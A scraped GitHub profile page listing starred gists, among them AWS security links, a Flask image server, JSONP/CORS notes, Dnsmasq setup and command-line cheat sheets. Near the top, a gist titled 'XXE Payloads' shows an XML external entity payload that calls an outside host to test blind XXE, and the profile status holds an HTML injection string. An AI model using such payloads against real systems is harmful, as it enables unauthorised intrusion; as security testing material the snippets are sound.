Skip to content

Instantly share code, notes, and snippets.

View 0xbharath's full-sized avatar
:shipit:
Debugging! <img src=1>

Bharath 0xbharath

:shipit:
Debugging! <img src=1>
377 followers · 347 following
View GitHub Profile
@staaldraad
staaldraad / XXE_payloads
Last active March 31, 2025 07:19
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@chanj
chanj / AWS Security Resources
Last active June 21, 2021 09:49
AWS Security Resources
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link: http://tiny.cc/awssecurity
Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
@peterkuma
peterkuma / server.py
Created February 10, 2014 14:22
A flask server for serving all JPEG images in a local directory and subdirectories. Uses unveil.js for lazy-loading of images. Thumbnails are created on the fly by PIL.
#!/bin/python
import os
from flask import Flask, Response, request, abort, render_template_string, send_from_directory
import Image
import StringIO
app = Flask(__name__)
WIDTH = 1000
@jo
jo / js-crypto-libraries.md
Last active January 16, 2025 12:08
List of JavaScript Crypto libraries.

JavaScript Crypto Libraries

List some crypto libraries for JavaScript out there. Might be a bit out dated. Scroll to the bottom.

WebCryptoAPI

http://www.w3.org/TR/WebCryptoAPI/

This specification describes a JavaScript API for performing basic cryptographic operations in web applications, such as hashing, signature generation and verification, and encryption and decryption. Additionally, it describes an API for applications to generate and/or manage the keying material necessary to perform these operations. Uses for this API range from user or service authentication, document or code signing, and the confidentiality and integrity of communications.

@karanth
karanth / jsonp-cors-pub.md
Last active September 11, 2022 01:52
Notes on JSONP and CORS - cross-domain AJAX calls

There are many situations on the browser client when it would be desirable to make an AJAX call to a web-site or web service to fetch data. Many a time, the data source is on a different domain than the one from where the request is originating. These are called cross-domain requests. All browsers discourage scripts from making cross-domain requests as they are wary of the security implications in allowing arbitrary data requests across trust boundaries. At Scibler, the browser plugin that gets activated on the google mail domain needs to request data from Scibler servers to create an integrated experience for a user.

Partial mitigation of 2 important attacks is a reason why browsers advocate the Same Origin Policy (SOP) for data requests. One is called XSRF or CSRF (pronounced sea-surf) and the other XSS.

[XSRF] (http://en.wikipedia.org/wiki/Cross-site_request_forgery) stands for Cross-site Request Forgery, where in, trust on a user's browser that is providing a session with a particular site is hi

@magnetikonline
magnetikonline / README.md
Last active December 22, 2021 17:13
Using Dnsmasq with Ubuntu 16.04LTS/14.04LTS/12.04LTS for virtual machine web application testing.

Using Dnsmasq with Ubuntu for VM web application testing

When running virtual machines under a Linux host system for testing web apps in various browsers (e.g. Internet Explorer), I found it rather tedious having to continually tweak the hosts file within each VM for the purpose of adding entries pointing back to the host machine's development web server address.

Instead the steps below will setup Dnsmasq on a Ubuntu 16.04LTS, 14.04LTS or 12.04LTS host machine for the purpose of serving both it's own DNS queries and that of virtual machine guests. Dnsmasq will parse the /etc/hosts file on your host machine where we will keep a single set of DNS entires to our test web application(s).

@killercup
killercup / pandoc.css
Created July 3, 2013 11:31
Add this to your Pandoc HTML documents using `--css pandoc.css` to make them look more awesome. (Tested with Markdown and LaTeX.)
/*
* I add this to html files generated with pandoc.
*/
html {
font-size: 100%;
overflow-y: scroll;
-webkit-text-size-adjust: 100%;
-ms-text-size-adjust: 100%;
}
@willurd
willurd / web-servers.md
Last active April 20, 2025 00:42
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@maciakl
maciakl / ptyon-m.markdown
Last active June 20, 2019 14:40

Built-in Tools in Python

List of command line accessible tools built into the python standard library.

Encoding

Base64 en/decoding:

python -m base64 -d [file]

python -m base64 -e [file]

@zealinux
zealinux / convert.demo.sh
Created September 26, 2012 13:59
imagemagick convert cheat sheet
= IMAGEMAGICK
Working with images, PDFs and the command line
# convert from one format to another
convert image.gif image.jpg
# convert specific PDF page to image